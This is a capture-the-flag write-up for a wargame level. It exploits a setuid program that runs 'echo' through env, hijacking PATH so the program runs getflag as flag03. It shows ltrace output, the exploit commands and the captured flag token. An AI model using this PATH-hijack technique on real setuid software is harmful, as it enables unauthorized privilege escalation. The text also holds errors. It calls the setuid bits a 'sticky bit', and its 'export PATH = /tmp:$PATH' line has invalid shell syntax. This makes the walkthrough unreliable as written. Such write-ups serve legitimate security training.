# Level 03 instructions:

## Check home directory:
```
$ ls -l
total 12
-rwsr-sr-x 1 flag03 level03 8627 Mar  5  2016 level03
```

Since the sticky bit is set, the program will run as flag03 meaning we could run arbitrary commands as flag03 if we figure out how to exploit it.

## Try to run level03:
```
$ ./level03
Exploit me
```

## Trace the library calls of level03:
```
$ ltrace ./level03
_libc_start_main(0x80484a4, 1, 0xbffff7c4, 0x8048510, 0x8048580 <unfinished ...>
getegid()                                 = 2003
geteuid()                                 = 2003
setresgid(2003, 2003, 2003, 0xb7e5ee55, 0xb7fed280) = 0
setresuid(2003, 2003, 2003, 0xb7e5ee55, 0xb7fed280) = 0
system("/usr/bin/env echo Exploit me"Exploit me
 <unfinished ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                    = 0
+++ exited (status 0) +++
```

## Exploit it
As echo is found using path and isn't called using an absolute path, we can convince the system to run another file of ours by modifying the path.
```
$ export PATH = /tmp:$PATH
$ cp /bin/getflag /tmp/echo
$ ./level03
Check flag.Here is your token : qi0maab88jeaj46qoumi7maus
```
Because we added /tmp to the beginning of our path, when env looks for the echo executable it will find our executable first which is really just getflag. This results in getflag being run as flag03.
